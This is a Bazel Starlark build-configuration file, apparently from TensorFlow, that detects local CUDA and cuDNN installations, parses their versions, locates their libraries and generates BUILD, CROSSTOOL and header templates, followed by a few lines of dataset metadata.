if inc not in includes_cpp_set]
def auto_configure_fail(msg):
"""Output failure message when cuda configuration fails."""
red = "\033[0;31m"
no_color = "\033[0m"
fail("\n%sCuda Configuration Error:%s %s\n" % (red, no_color, msg))
# END cc_configure common functions (see TODO above).
def _host_compiler_includes(repository_ctx, cc):
"""Generates the cxx_builtin_include_directory entries for gcc inc dirs.
Args:
repository_ctx: The repository context.
cc: The path to the gcc host compiler.
Returns:
A string containing the cxx_builtin_include_directory for each of the gcc
host compiler include directories, which can be added to the CROSSTOOL
file.
"""
inc_dirs = get_cxx_inc_directories(repository_ctx, cc)
inc_entries = []
for inc_dir in inc_dirs:
inc_entries.append(" cxx_builtin_include_directory: \"%s\"" % inc_dir)
return "\n".join(inc_entries)
def _cuda_include_path(repository_ctx, cuda_config):
"""Generates the cxx_builtin_include_directory entries for cuda inc dirs.
Args:
repository_ctx: The repository context.
cc: The path to the gcc host compiler.
Returns:
A string containing the cxx_builtin_include_directory for each of the gcc
host compiler include directories, which can be added to the CROSSTOOL
file.
"""
nvcc_path = repository_ctx.path("%s/bin/nvcc%s" %
(cuda_config.cuda_toolkit_path,
".exe" if cuda_config.cpu_value == "Windows" else ""))
result = repository_ctx.execute([nvcc_path, '-v',
'/dev/null', '-o', '/dev/null'])
target_dir = ""
for one_line in result.stderr.splitlines():
if one_line.startswith('#$ _TARGET_DIR_='):
target_dir = (cuda_config.cuda_toolkit_path + '/' +
one_line.replace('#$ _TARGET_DIR_=', '') + "/include")
inc_entries = []
if target_dir != "":
inc_entries.append(" cxx_builtin_include_directory: \"%s\"" % target_dir)
default_include = cuda_config.cuda_toolkit_path + '/include'
inc_entries.append(" cxx_builtin_include_directory: \"%s\"" %
default_include)
return "\n".join(inc_entries)
def _enable_cuda(repository_ctx):
if "TF_NEED_CUDA" in repository_ctx.os.environ:
enable_cuda = repository_ctx.os.environ["TF_NEED_CUDA"].strip()
return enable_cuda == "1"
return False
def _cuda_toolkit_path(repository_ctx):
"""Finds the cuda toolkit directory.
Args:
repository_ctx: The repository context.
Returns:
A speculative real path of the cuda toolkit install directory.
"""
cuda_toolkit_path = _DEFAULT_CUDA_TOOLKIT_PATH
if _CUDA_TOOLKIT_PATH in repository_ctx.os.environ:
cuda_toolkit_path = repository_ctx.os.environ[_CUDA_TOOLKIT_PATH].strip()
if not repository_ctx.path(cuda_toolkit_path).exists:
auto_configure_fail("Cannot find cuda toolkit path.")
return str(repository_ctx.path(cuda_toolkit_path).realpath)
def _cudnn_install_basedir(repository_ctx):
"""Finds the cudnn install directory."""
cudnn_install_path = _DEFAULT_CUDNN_INSTALL_PATH
if _CUDNN_INSTALL_PATH in repository_ctx.os.environ:
cudnn_install_path = repository_ctx.os.environ[_CUDNN_INSTALL_PATH].strip()
if not repository_ctx.path(cudnn_install_path).exists:
auto_configure_fail("Cannot find cudnn install path.")
return cudnn_install_path
def _matches_version(environ_version, detected_version):
"""Checks whether the user-specified version matches the detected version.
This function performs a weak matching so that if the user specifies only the
major or major and minor versions, the versions are still considered matching
if the version parts match. To illustrate:
environ_version detected_version result
-----------------------------------------
5.1.3 5.1.3 True
5.1 5.1.3 True
5 5.1 True
5.1.3 5.1 False
5.2.3 5.1.3 False
Args:
environ_version: The version specified by the user via environment
variables.
detected_version: The version autodetected from the CUDA installation on
the system.
Returns: True if user-specified version matches detected version and False
otherwise.
"""
environ_version_parts = environ_version.split(".")
detected_version_parts = detected_version.split(".")
if len(detected_version_parts) < len(environ_version_parts):
return False
for i, part in enumerate(detected_version_parts):
if i >= len(environ_version_parts):
break
if part != environ_version_parts[i]:
return False
return True
_NVCC_VERSION_PREFIX = "Cuda compilation tools, release "
def _cuda_version(repository_ctx, cuda_toolkit_path, cpu_value):
"""Detects the version of CUDA installed on the system.
Args:
repository_ctx: The repository context.
cuda_toolkit_path: The CUDA install directory.
Returns:
String containing the version of CUDA.
"""
# Run nvcc --version and find the line containing the CUDA version.
nvcc_path = repository_ctx.path("%s/bin/nvcc%s" %
(cuda_toolkit_path,
".exe" if cpu_value == "Windows" else ""))
if not nvcc_path.exists:
auto_configure_fail("Cannot find nvcc at %s" % str(nvcc_path))
result = repository_ctx.execute([str(nvcc_path), '--version'])
if result.stderr:
auto_configure_fail("Error running nvcc --version: %s" % result.stderr)
lines = result.stdout.splitlines()
version_line = lines[len(lines) - 1]
if version_line.find(_NVCC_VERSION_PREFIX) == -1:
auto_configure_fail(
"Could not parse CUDA version from nvcc --version. Got: %s" %
result.stdout)
# Parse the CUDA version from the line containing the CUDA version.
prefix_removed = version_line.replace(_NVCC_VERSION_PREFIX, '')
parts = prefix_removed.split(",")
if len(parts) != 2 or len(parts[0]) < 2:
auto_configure_fail(
"Could not parse CUDA version from nvcc --version. Got: %s" %
result.stdout)
full_version = parts[1].strip()
if full_version.startswith('V'):
full_version = full_version[1:]
# Check whether TF_CUDA_VERSION was set by the user and fail if it does not
# match the detected version.
environ_version = ""
if _TF_CUDA_VERSION in repository_ctx.os.environ:
environ_version = repository_ctx.os.environ[_TF_CUDA_VERSION].strip()
if environ_version and not _matches_version(environ_version, full_version):
auto_configure_fail(
("CUDA version detected from nvcc (%s) does not match " +
"TF_CUDA_VERSION (%s)") % (full_version, environ_version))
# We only use the version consisting of the major and minor version numbers.
version_parts = full_version.split('.')
if len(version_parts) < 2:
auto_configure_fail("CUDA version detected from nvcc (%s) is incomplete.")
if cpu_value == "Windows":
version = "64_%s%s" % (version_parts[0], version_parts[1])
else:
version = "%s.%s" % (version_parts[0], version_parts[1])
return version
_DEFINE_CUDNN_MAJOR = "#define CUDNN_MAJOR"
_DEFINE_CUDNN_MINOR = "#define CUDNN_MINOR"
_DEFINE_CUDNN_PATCHLEVEL = "#define CUDNN_PATCHLEVEL"
def _find_cuda_define(repository_ctx, cudnn_header_dir, define):
"""Returns the value of a #define in cudnn.h
Greps through cudnn.h and returns the value of the specified #define. If the
#define is not found, then raise an error.
Args:
repository_ctx: The repository context.
cudnn_header_dir: The directory containing the cuDNN header.
define: The #define to search for.
Returns:
The value of the #define found in cudnn.h.
"""
# Confirm location of cudnn.h and grep for the line defining CUDNN_MAJOR.
cudnn_h_path = repository_ctx.path("%s/cudnn.h" % cudnn_header_dir)
if not cudnn_h_path.exists:
auto_configure_fail("Cannot find cudnn.h at %s" % str(cudnn_h_path))
result = repository_ctx.execute(["grep", "--color=never", "-E", define, str(cudnn_h_path)])
if result.stderr:
auto_configure_fail("Error reading %s: %s" %
(result.stderr, str(cudnn_h_path)))
# Parse the cuDNN major version from the line defining CUDNN_MAJOR
lines = result.stdout.splitlines()
if len(lines) == 0 or lines[0].find(define) == -1:
auto_configure_fail("Cannot find line containing '%s' in %s" %
(define, str(cudnn_h_path)))
return lines[0].replace(define, "").strip()
def _cudnn_version(repository_ctx, cudnn_install_basedir, cpu_value):
"""Detects the version of cuDNN installed on the system.
Args:
repository_ctx: The repository context.
cpu_value: The name of the host operating system.
cudnn_install_basedir: The cuDNN install directory.
Returns:
A string containing the version of cuDNN.
"""
cudnn_header_dir = _find_cudnn_header_dir(repository_ctx,
cudnn_install_basedir)
major_version = _find_cuda_define(repository_ctx, cudnn_header_dir,
_DEFINE_CUDNN_MAJOR)
minor_version = _find_cuda_define(repository_ctx, cudnn_header_dir,
_DEFINE_CUDNN_MINOR)
patch_version = _find_cuda_define(repository_ctx, cudnn_header_dir,
_DEFINE_CUDNN_PATCHLEVEL)
full_version = "%s.%s.%s" % (major_version, minor_version, patch_version)
# Check whether TF_CUDNN_VERSION was set by the user and fail if it does not
# match the detected version.
environ_version = ""
if _TF_CUDNN_VERSION in repository_ctx.os.environ:
environ_version = repository_ctx.os.environ[_TF_CUDNN_VERSION].strip()
if environ_version and not _matches_version(environ_version, full_version):
cudnn_h_path = repository_ctx.path("%s/include/cudnn.h" %
cudnn_install_basedir)
auto_configure_fail(
("cuDNN version detected from %s (%s) does not match " +
"TF_CUDNN_VERSION (%s)") %
(str(cudnn_h_path), full_version, environ_version))
# We only use the major version since we use the libcudnn libraries that are
# only versioned with the major version (e.g. libcudnn.so.5).
version = major_version
if cpu_value == "Windows":
version = "64_" + version
return version
def _compute_capabilities(repository_ctx):
"""Returns a list of strings representing cuda compute capabilities."""
if _TF_CUDA_COMPUTE_CAPABILITIES not in repository_ctx.os.environ:
return _DEFAULT_CUDA_COMPUTE_CAPABILITIES
capabilities_str = repository_ctx.os.environ[_TF_CUDA_COMPUTE_CAPABILITIES]
capabilities = capabilities_str.split(",")
for capability in capabilities:
# Workaround for Skylark's lack of support for regex. This check should
# be equivalent to checking:
# if re.match("[0-9]+.[0-9]+", capability) == None:
parts = capability.split(".")
if len(parts) != 2 or not parts[0].isdigit() or not parts[1].isdigit():
auto_configure_fail("Invalid compute capability: %s" % capability)
return capabilities
def _cpu_value(repository_ctx):
"""Returns the name of the host operating system.
Args:
repository_ctx: The repository context.
Returns:
A string containing the name of the host operating system.
"""
os_name = repository_ctx.os.name.lower()
if os_name.startswith("mac os"):
return "Darwin"
if os_name.find("windows") != -1:
return "Windows"
result = repository_ctx.execute(["uname", "-s"])
return result.stdout.strip()
def _is_windows(repository_ctx):
"""Returns true if the host operating system is windows."""
return _cpu_value(repository_ctx) == "Windows"
def _lib_name(lib, cpu_value, version="", static=False):
"""Constructs the platform-specific name of a library.
Args:
lib: The name of the library, such as "cudart"
cpu_value: The name of the host operating system.
version: The version of the library.
static: True the library is static or False if it is a shared object.
Returns:
The platform-specific name of the library.
"""
if cpu_value in ("Linux", "FreeBSD"):
if static:
return "lib%s.a" % lib
else:
if version:
version = ".%s" % version
return "lib%s.so%s" % (lib, version)
elif cpu_value == "Windows":
return "%s.lib" % lib
elif cpu_value == "Darwin":
if static:
return "lib%s.a" % lib
else:
if version:
version = ".%s" % version
return "lib%s%s.dylib" % (lib, version)
else:
auto_configure_fail("Invalid cpu_value: %s" % cpu_value)
def _find_cuda_lib(lib, repository_ctx, cpu_value, basedir, version="",
static=False):
"""Finds the given CUDA or cuDNN library on the system.
Args:
lib: The name of the library, such as "cudart"
repository_ctx: The repository context.
cpu_value: The name of the host operating system.
basedir: The install directory of CUDA or cuDNN.
version: The version of the library.
static: True if static library, False if shared object.
Returns:
Returns a struct with the following fields:
file_name: The basename of the library found on the system.
path: The full path to the library.
"""
file_name = _lib_name(lib, cpu_value, version, static)
if cpu_value == "Linux":
path = repository_ctx.path("%s/lib64/%s" % (basedir, file_name))
if path.exists:
return struct(file_name=file_name, path=str(path.realpath))
path = repository_ctx.path("%s/lib64/stubs/%s" % (basedir, file_name))
if path.exists:
return struct(file_name=file_name, path=str(path.realpath))
path = repository_ctx.path(
"%s/lib/x86_64-linux-gnu/%s" % (basedir, file_name))
if path.exists:
return struct(file_name=file_name, path=str(path.realpath))
elif cpu_value == "Windows":
path = repository_ctx.path("%s/lib/x64/%s" % (basedir, file_name))
if path.exists:
return struct(file_name=file_name, path=str(path.realpath))
path = repository_ctx.path("%s/lib/%s" % (basedir, file_name))
if path.exists:
return struct(file_name=file_name, path=str(path.realpath))
path = repository_ctx.path("%s/%s" % (basedir, file_name))
if path.exists:
return struct(file_name=file_name, path=str(path.realpath))
auto_configure_fail("Cannot find cuda library %s" % file_name)
def _find_cupti_lib(repository_ctx, cuda_config):
"""Finds the cupti library on the system.
On most systems, the cupti library is not installed in the same directory as
the other CUDA libraries but rather in a special extras/CUPTI directory.
Args:
repository_ctx: The repository context.
cuda_config: The cuda configuration as returned by _get_cuda_config.
Returns:
Returns a struct with the following fields:
file_name: The basename of the library found on the system.
path: The full path to the library.
"""
file_name = _lib_name("cupti", cuda_config.cpu_value,
cuda_config.cuda_version)
if cuda_config.cpu_value == "Linux":
path = repository_ctx.path(
"%s/extras/CUPTI/lib64/%s" % (cuda_config.cuda_toolkit_path, file_name))
if path.exists:
return struct(file_name=file_name, path=str(path.realpath))
path = repository_ctx.path(
"%s/lib/x86_64-linux-gnu/%s" % (cuda_config.cuda_toolkit_path,
file_name))
if path.exists:
return struct(file_name=file_name, path=str(path.realpath))
elif cuda_config.cpu_value == "Windows":
path = repository_ctx.path(
"%s/extras/CUPTI/libx64/%s" %
(cuda_config.cuda_toolkit_path, file_name))
if path.exists:
return struct(file_name=file_name, path=str(path.realpath))
path = repository_ctx.path(
"%s/extras/CUPTI/lib/%s" % (cuda_config.cuda_toolkit_path, file_name))
if path.exists:
return struct(file_name=file_name, path=str(path.realpath))
path = repository_ctx.path(
"%s/lib/%s" % (cuda_config.cuda_toolkit_path, file_name))
if path.exists:
return struct(file_name=file_name, path=str(path.realpath))
auto_configure_fail("Cannot find cupti library %s" % file_name)
def _find_libs(repository_ctx, cuda_config):
"""Returns the CUDA and cuDNN libraries on the system.
Args:
repository_ctx: The repository context.
cuda_config: The CUDA config as returned by _get_cuda_config
Returns:
Map of library names to structs of filename and path as returned by
_find_cuda_lib and _find_cupti_lib.
"""
cudnn_version = cuda_config.cudnn_version
cudnn_ext = ".%s" % cudnn_version if cudnn_version else ""
cpu_value = cuda_config.cpu_value
return {
"cuda": _find_cuda_lib("cuda", repository_ctx, cpu_value, cuda_config.cuda_toolkit_path),
"cudart": _find_cuda_lib(
"cudart", repository_ctx, cpu_value, cuda_config.cuda_toolkit_path,
cuda_config.cuda_version),
"cudart_static": _find_cuda_lib(
"cudart_static", repository_ctx, cpu_value,
cuda_config.cuda_toolkit_path, cuda_config.cuda_version, static=True),
"cublas": _find_cuda_lib(
"cublas", repository_ctx, cpu_value, cuda_config.cuda_toolkit_path,
cuda_config.cuda_version),
"cusolver": _find_cuda_lib(
"cusolver", repository_ctx, cpu_value, cuda_config.cuda_toolkit_path,
cuda_config.cuda_version),
"curand": _find_cuda_lib(
"curand", repository_ctx, cpu_value, cuda_config.cuda_toolkit_path,
cuda_config.cuda_version),
"cufft": _find_cuda_lib(
"cufft", repository_ctx, cpu_value, cuda_config.cuda_toolkit_path,
cuda_config.cuda_version),
"cudnn": _find_cuda_lib(
"cudnn", repository_ctx, cpu_value, cuda_config.cudnn_install_basedir,
cuda_config.cudnn_version),
"cupti": _find_cupti_lib(repository_ctx, cuda_config),
}
def _find_cudnn_header_dir(repository_ctx, cudnn_install_basedir):
"""Returns the path to the directory containing cudnn.h
Args:
repository_ctx: The repository context.
cudnn_install_basedir: The cudnn install directory as returned by
_cudnn_install_basedir.
Returns:
The path of the directory containing the cudnn header.
"""
if repository_ctx.path(cudnn_install_basedir + "/cudnn.h").exists:
return cudnn_install_basedir
if repository_ctx.path(cudnn_install_basedir + "/include/cudnn.h").exists:
return cudnn_install_basedir + "/include"
if repository_ctx.path("/usr/include/cudnn.h").exists:
return "/usr/include"
auto_configure_fail("Cannot find cudnn.h under %s" % cudnn_install_basedir)
def _find_cudnn_lib_path(repository_ctx, cudnn_install_basedir, symlink_files):
"""Returns the path to the directory containing libcudnn
Args:
repository_ctx: The repository context.
cudnn_install_basedir: The cudnn install dir as returned by
_cudnn_install_basedir.
symlink_files: The symlink files as returned by _cuda_symlink_files.
Returns:
The path of the directory containing the cudnn libraries.
"""
lib_dir = cudnn_install_basedir + "/" + symlink_files.cuda_dnn_lib
if repository_ctx.path(lib_dir).exists:
return lib_dir
alt_lib_dir = cudnn_install_basedir + "/" + symlink_files.cuda_dnn_lib_alt
if repository_ctx.path(alt_lib_dir).exists:
return alt_lib_dir
auto_configure_fail("Cannot find %s or %s under %s" %
(symlink_files.cuda_dnn_lib, symlink_files.cuda_dnn_lib_alt,
cudnn_install_basedir))
def _cudart_static_linkopt(cpu_value):
"""Returns additional platform-specific linkopts for cudart."""
return "" if cpu_value == "Darwin" else "\"-lrt\","
def _get_cuda_config(repository_ctx):
"""Detects and returns information about the CUDA installation on the system.
Args:
repository_ctx: The repository context.
Returns:
A struct containing the following fields:
cuda_toolkit_path: The CUDA toolkit installation directory.
cudnn_install_basedir: The cuDNN installation directory.
cuda_version: The version of CUDA on the system.
cudnn_version: The version of cuDNN on the system.
compute_capabilities: A list of the system's CUDA compute capabilities.
cpu_value: The name of the host operating system.
"""
cpu_value = _cpu_value(repository_ctx)
cuda_toolkit_path = _cuda_toolkit_path(repository_ctx)
cuda_version = _cuda_version(repository_ctx, cuda_toolkit_path, cpu_value)
cudnn_install_basedir = _cudnn_install_basedir(repository_ctx)
cudnn_version = _cudnn_version(repository_ctx, cudnn_install_basedir, cpu_value)
return struct(
cuda_toolkit_path = cuda_toolkit_path,
cudnn_install_basedir = cudnn_install_basedir,
cuda_version = cuda_version,
cudnn_version = cudnn_version,
compute_capabilities = _compute_capabilities(repository_ctx),
cpu_value = cpu_value)
def _tpl(repository_ctx, tpl, substitutions={}, out=None):
if not out:
out = tpl.replace(":", "/")
repository_ctx.template(
out,
Label("//third_party/gpus/%s.tpl" % tpl),
substitutions)
def _file(repository_ctx, label):
repository_ctx.template(
label.replace(":", "/"),
Label("//third_party/gpus/%s.tpl" % label),
{})
_DUMMY_CROSSTOOL_BZL_FILE = """
def error_gpu_disabled():
fail("ERROR: Building with --config=cuda but TensorFlow is not configured " +
"to build with GPU support. Please re-run ./configure and enter 'Y' " +
"at the prompt to build with GPU support.")
native.genrule(
name = "error_gen_crosstool",
outs = ["CROSSTOOL"],
cmd = "echo 'Should not be run.' && exit 1",
)
native.filegroup(
name = "crosstool",
srcs = [":CROSSTOOL"],
output_licenses = ["unencumbered"],
)
"""
_DUMMY_CROSSTOOL_BUILD_FILE = """
load("//crosstool:error_gpu_disabled.bzl", "error_gpu_disabled")
error_gpu_disabled()
"""
def _create_dummy_repository(repository_ctx):
cpu_value = _cpu_value(repository_ctx)
# Set up BUILD file for cuda/.
_tpl(repository_ctx, "cuda:build_defs.bzl",
{
"%{cuda_is_configured}": "False",
"%{cuda_extra_copts}": "[]"
})
_tpl(repository_ctx, "cuda:BUILD",
{
"%{cuda_driver_lib}": _lib_name("cuda", cpu_value),
"%{cudart_static_lib}": _lib_name("cudart_static", cpu_value,
static=True),
"%{cudart_static_linkopt}": _cudart_static_linkopt(cpu_value),
"%{cudart_lib}": _lib_name("cudart", cpu_value),
"%{cublas_lib}": _lib_name("cublas", cpu_value),
"%{cusolver_lib}": _lib_name("cusolver", cpu_value),
"%{cudnn_lib}": _lib_name("cudnn", cpu_value),
"%{cufft_lib}": _lib_name("cufft", cpu_value),
"%{curand_lib}": _lib_name("curand", cpu_value),
"%{cupti_lib}": _lib_name("cupti", cpu_value),
"%{cuda_include_genrules}": '',
"%{cuda_headers}": '',
})
# Create dummy files for the CUDA toolkit since they are still required by
# tensorflow/core/platform/default/build_config:cuda.
repository_ctx.file("cuda/include/cuda.h", "")
repository_ctx.file("cuda/include/cublas.h", "")
repository_ctx.file("cuda/include/cudnn.h", "")
repository_ctx.file("cuda/extras/CUPTI/include/cupti.h", "")
repository_ctx.file("cuda/lib/%s" % _lib_name("cuda", cpu_value))
repository_ctx.file("cuda/lib/%s" % _lib_name("cudart", cpu_value))
repository_ctx.file("cuda/lib/%s" % _lib_name("cudart_static", cpu_value))
repository_ctx.file("cuda/lib/%s" % _lib_name("cublas", cpu_value))
repository_ctx.file("cuda/lib/%s" % _lib_name("cusolver", cpu_value))
repository_ctx.file("cuda/lib/%s" % _lib_name("cudnn", cpu_value))
repository_ctx.file("cuda/lib/%s" % _lib_name("curand", cpu_value))
repository_ctx.file("cuda/lib/%s" % _lib_name("cufft", cpu_value))
repository_ctx.file("cuda/lib/%s" % _lib_name("cupti", cpu_value))
# Set up cuda_config.h, which is used by
# tensorflow/stream_executor/dso_loader.cc.
_tpl(repository_ctx, "cuda:cuda_config.h",
{
"%{cuda_version}": _DEFAULT_CUDA_VERSION,
"%{cudnn_version}": _DEFAULT_CUDNN_VERSION,
"%{cuda_compute_capabilities}": ",".join([
"CudaVersion(\"%s\")" % c
for c in _DEFAULT_CUDA_COMPUTE_CAPABILITIES]),
"%{cuda_toolkit_path}": _DEFAULT_CUDA_TOOLKIT_PATH,
})
# If cuda_configure is not configured to build with GPU support, and the user
# attempts to build with --config=cuda, add a dummy build rule to intercept
# this and fail with an actionable error message.
repository_ctx.file("crosstool/error_gpu_disabled.bzl",
_DUMMY_CROSSTOOL_BZL_FILE)
repository_ctx.file("crosstool/BUILD", _DUMMY_CROSSTOOL_BUILD_FILE)
def _execute(repository_ctx, cmdline, error_msg=None, error_details=None,
empty_stdout_fine=False):
"""Executes an arbitrary shell command.
Args:
repository_ctx: the repository_ctx object
cmdline: list of strings, the command to execute
error_msg: string, a summary of the error if the command fails
error_details: string, details about the error or steps to fix it
empty_stdout_fine: bool, if True, an empty stdout result is fine, otherwise
it's an error
Return:
the result of repository_ctx.execute(cmdline)
"""
result = repository_ctx.execute(cmdline)
if result.stderr or not (empty_stdout_fine or result.stdout):
auto_configure_fail(
"\n".join([
error_msg.strip() if error_msg else "Repository command failed",
result.stderr.strip(),
error_details if error_details else ""]))
return result
def _norm_path(path):
"""Returns a path with '/' and remove the trailing slash."""
path = path.replace("\\", "/")
if path[-1] == "/":
path = path[:-1]
return path
def _symlink_genrule_for_dir(repository_ctx, src_dir, dest_dir, genrule_name,
src_files = [], dest_files = []):
"""Returns a genrule to symlink(or copy if on Windows) a set of files.
If src_dir is passed, files will be read from the given directory; otherwise
we assume files are in src_files and dest_files
"""
if src_dir != None:
src_dir = _norm_path(src_dir)
dest_dir = _norm_path(dest_dir)
files = _read_dir(repository_ctx, src_dir)
# Create a list with the src_dir stripped to use for outputs.
dest_files = files.replace(src_dir, '').splitlines()
src_files = files.splitlines()
command = []
outs = []
for i in range(len(dest_files)):
if dest_files[i] != "":
# If we have only one file to link we do not want to use the dest_dir, as
# $(@D) will include the full path to the file.
dest = '$(@D)/' + dest_dir + dest_files[i] if len(dest_files) != 1 else '$(@D)/' + dest_files[i]
# On Windows, symlink is not supported, so we just copy all the files.
cmd = 'cp -f' if _is_windows(repository_ctx) else 'ln -s'
command.append(cmd + ' "%s" "%s"' % (src_files[i] , dest))
outs.append(' "' + dest_dir + dest_files[i] + '",')
genrule = _genrule(src_dir, genrule_name, " && ".join(command),
"\n".join(outs))
return genrule
def _genrule(src_dir, genrule_name, command, outs):
"""Returns a string with a genrule.
Genrule executes the given command and produces the given outputs.
"""
return (
'genrule(\n' +
' name = "' +
genrule_name + '",\n' +
' outs = [\n' +
outs +
' ],\n' +
' cmd = """\n' +
command +
' """,\n' +
')\n\n'
)
def _read_dir(repository_ctx, src_dir):
"""Returns a string with all files in a directory.
Finds all files inside a directory, traversing subfolders and following
symlinks. The returned string contains the full path of all files
separated by line breaks.
"""
if _is_windows(repository_ctx):
src_dir = src_dir.replace("/", "\\")
find_result = _execute(
repository_ctx, ["cmd.exe", "/c", "dir", src_dir, "/b", "/s", "/a-d"],
empty_stdout_fine=True)
# src_files will be used in genrule.outs where the paths must
# use forward slashes.
result = find_result.stdout.replace("\\", "/")
else:
find_result = _execute(
repository_ctx, ["find", src_dir, "-follow", "-type", "f"],
empty_stdout_fine=True)
result = find_result.stdout
return result
def _use_cuda_clang(repository_ctx):
if "TF_CUDA_CLANG" in repository_ctx.os.environ:
enable_cuda = repository_ctx.os.environ["TF_CUDA_CLANG"].strip()
return enable_cuda == "1"
return False
def _compute_cuda_extra_copts(repository_ctx, compute_capabilities):
if _use_cuda_clang(repository_ctx):
capability_flags = ["--cuda-gpu-arch=sm_" +
cap.replace(".", "") for cap in compute_capabilities]
else:
# Capabilities are handled in the "crosstool_wrapper_driver_is_not_gcc" for nvcc
capability_flags = []
return str(capability_flags)
def _create_local_cuda_repository(repository_ctx):
"""Creates the repository containing files set up to build with CUDA."""
cuda_config = _get_cuda_config(repository_ctx)
cudnn_header_dir = _find_cudnn_header_dir(repository_ctx,
cuda_config.cudnn_install_basedir)
# Set up symbolic links for the cuda toolkit by creating genrules to do
# symlinking. We create one genrule for each directory we want to track under
# cuda_toolkit_path
cuda_toolkit_path = cuda_config.cuda_toolkit_path
cuda_include_path = cuda_toolkit_path + "/include"
genrules = [_symlink_genrule_for_dir(repository_ctx,
cuda_include_path, "include", "cuda-include")]
genrules.append(_symlink_genrule_for_dir(repository_ctx,
cuda_toolkit_path + "/nvvm", "nvvm", "cuda-nvvm"))
genrules.append(_symlink_genrule_for_dir(repository_ctx,
cuda_toolkit_path + "/extras/CUPTI/include",
"extras/CUPTI/include", "cuda-extras"))
cuda_libs = _find_libs(repository_ctx, cuda_config)
cuda_lib_src = []
cuda_lib_dest = []
for lib in cuda_libs.values():
cuda_lib_src.append(lib.path)
cuda_lib_dest.append("lib/" + lib.file_name)
genrules.append(_symlink_genrule_for_dir(repository_ctx, None, "", "cuda-lib",
cuda_lib_src, cuda_lib_dest))
# Set up the symbolic links for cudnn if cudnn was was not installed to
# CUDA_TOOLKIT_PATH.
included_files = _read_dir(repository_ctx, cuda_include_path).replace(
cuda_include_path, '').splitlines()
if '/cudnn.h' not in included_files:
genrules.append(_symlink_genrule_for_dir(repository_ctx, None, "include/",
"cudnn-include", [cudnn_header_dir + "/cudnn.h"], ["cudnn.h"]))
else:
genrules.append(
'filegroup(\n' +
' name = "cudnn-include",\n' +
' srcs = [],\n' +
')\n'
)
# Set up BUILD file for cuda/
_tpl(repository_ctx, "cuda:build_defs.bzl",
{
"%{cuda_is_configured}": "True",
"%{cuda_extra_copts}": _compute_cuda_extra_copts(
repository_ctx, cuda_config.compute_capabilities),
})
_tpl(repository_ctx, "cuda:BUILD",
{
"%{cuda_driver_lib}": cuda_libs["cuda"].file_name,
"%{cudart_static_lib}": cuda_libs["cudart_static"].file_name,
"%{cudart_static_linkopt}": _cudart_static_linkopt(
cuda_config.cpu_value),
"%{cudart_lib}": cuda_libs["cudart"].file_name,
"%{cublas_lib}": cuda_libs["cublas"].file_name,
"%{cusolver_lib}": cuda_libs["cusolver"].file_name,
"%{cudnn_lib}": cuda_libs["cudnn"].file_name,
"%{cufft_lib}": cuda_libs["cufft"].file_name,
"%{curand_lib}": cuda_libs["curand"].file_name,
"%{cupti_lib}": cuda_libs["cupti"].file_name,
"%{cuda_include_genrules}": "\n".join(genrules),
"%{cuda_headers}": ('":cuda-include",\n' +
' ":cudnn-include",')
})
# Set up crosstool/
_file(repository_ctx, "crosstool:BUILD")
cc = find_cc(repository_ctx)
host_compiler_includes = _host_compiler_includes(repository_ctx, cc)
cuda_defines = {
"%{cuda_include_path}": _cuda_include_path(repository_ctx,
cuda_config),
"%{host_compiler_includes}": host_compiler_includes,
}
if _use_cuda_clang(repository_ctx):
cuda_defines["%{clang_path}"] = cc
_tpl(repository_ctx, "crosstool:CROSSTOOL_clang", cuda_defines, out="crosstool/CROSSTOOL")
else:
nvcc_path = str(repository_ctx.path("%s/bin/nvcc%s" %
(cuda_config.cuda_toolkit_path,
".exe" if cuda_config.cpu_value == "Windows" else "")))
_tpl(repository_ctx, "crosstool:CROSSTOOL_nvcc", cuda_defines, out="crosstool/CROSSTOOL")
_tpl(repository_ctx,
"crosstool:clang/bin/crosstool_wrapper_driver_is_not_gcc",
{
"%{cpu_compiler}": str(cc),
"%{cuda_version}": cuda_config.cuda_version,
"%{nvcc_path}": nvcc_path,
"%{gcc_host_compiler_path}": str(cc),
"%{cuda_compute_capabilities}": ", ".join(
["\"%s\"" % c for c in cuda_config.compute_capabilities]),
})
# Set up cuda_config.h, which is used by
# tensorflow/stream_executor/dso_loader.cc.
_tpl(repository_ctx, "cuda:cuda_config.h",
{
"%{cuda_version}": cuda_config.cuda_version,
"%{cudnn_version}": cuda_config.cudnn_version,
"%{cuda_compute_capabilities}": ",".join(
["CudaVersion(\"%s\")" % c
for c in cuda_config.compute_capabilities]),
"%{cuda_toolkit_path}": cuda_config.cuda_toolkit_path,
})
def _create_remote_cuda_repository(repository_ctx, remote_config_repo):
"""Creates pointers to a remotely configured repo set up to build with CUDA."""
_tpl(repository_ctx, "cuda:build_defs.bzl",
{
"%{cuda_is_configured}": "True",
"%{cuda_extra_copts}": _compute_cuda_extra_copts(
repository_ctx, _compute_capabilities(repository_ctx)),
})
_tpl(repository_ctx, "cuda:remote.BUILD",
{
"%{remote_cuda_repo}": remote_config_repo,
}, "cuda/BUILD")
_tpl(repository_ctx, "crosstool:remote.BUILD", {
"%{remote_cuda_repo}": remote_config_repo,
}, "crosstool/BUILD")
def _cuda_autoconf_impl(repository_ctx):
"""Implementation of the cuda_autoconf repository rule."""
if not _enable_cuda(repository_ctx):
_create_dummy_repository(repository_ctx)
else:
if _TF_CUDA_CONFIG_REPO in repository_ctx.os.environ:
_create_remote_cuda_repository(repository_ctx,
repository_ctx.os.environ[_TF_CUDA_CONFIG_REPO])
elif repository_ctx.attr.remote_config_repo != "":
_create_remote_cuda_repository(repository_ctx,
repository_ctx.attr.remote_config_repo)
else:
_create_local_cuda_repository(repository_ctx)
cuda_configure = repository_rule(
implementation = _cuda_autoconf_impl,
attrs = {
"remote_config_repo": attr.string(mandatory = False, default =""),
},
environ = [
_GCC_HOST_COMPILER_PATH,
"TF_NEED_CUDA",
_CUDA_TOOLKIT_PATH,
_CUDNN_INSTALL_PATH,
_TF_CUDA_VERSION,
_TF_CUDNN_VERSION,
_TF_CUDA_COMPUTE_CAPABILITIES,
_TF_CUDA_CONFIG_REPO,
],
)
"""Detects and configures the local CUDA toolchain.
Add the following to your WORKSPACE FILE:
```python
cuda_configure(
name = "local_config_cuda"
remote_config_repo = "@remote_cuda_config_tf//"
)
```
Args:
name: A unique name for this workspace rule.
remote_config_repo: Location of a pre-generated config (optional).
"""
| 38.155285
| 102
| 0.685667
|
c22e7d51fcf664ed54930eb8e3af70acc6a49a2b
| 9,552
|
py
|
Python
|
docs/conf.py
|
deprecated/nebulio
|
8548d9f44117206e9314d676576b24c1bc5e1c76
|
[
"MIT"
] | null | null | null |
docs/conf.py
|
deprecated/nebulio
|
8548d9f44117206e9314d676576b24c1bc5e1c76
|
[
